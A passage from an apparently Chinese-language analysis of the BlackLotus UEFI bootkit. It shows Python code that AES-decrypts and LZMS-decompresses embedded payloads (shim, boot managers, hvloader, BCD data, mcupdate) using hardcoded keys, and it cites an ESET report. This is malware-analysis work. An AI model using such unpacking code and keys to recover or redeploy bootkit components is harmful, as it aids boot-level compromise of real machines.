bs = bytes(c_outbuf)
return bs
return None
def dec_lzms(key, data, outpath):
iv = b'\x00'*16
aes = AES.new(key, AES.MODE_CBC, iv)
dec = aes.decrypt(bytes(data))
bs = lzms(dec, len(dec))
if bs:
with open(outpath, 'wb') as f:
f.write(bs)
print('ov')
else:
print('lzms none!')
if __name__ == '__main__':
# dec_aes(bootkit_data,'bootkit.bin',b'By3h2zWrQxPF9ijYLqMl8ojenCInrWZG')
lzms_key=b'6jxkPUHKRK5rgdg0PkhLhuS844uMYgrm'
dec_lzms(lzms_key, lzms_shim_data,mdir+'shim.bin')
dec_lzms(lzms_key, lzms_official_bootmgfw_data,mdir+'official_bootmgfw.bin')
dec_lzms(lzms_key, lzms_official_bootmgr_data,mdir+'official_bootmgr.bin')
dec_lzms(lzms_key, lzms_hvloader_data,mdir+'hvloader.bin')
dec_aes(bcd_setup0_encdata, mdir+'bcd_setup0.bin',lzms_key)
dec_aes(bcd_exp_encdata, mdir+'bcd_exp.bin',lzms_key)
dec_aes(mcupdate_encdata, mdir+'mcupdate.bin',lzms_key)
参考链接
https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/
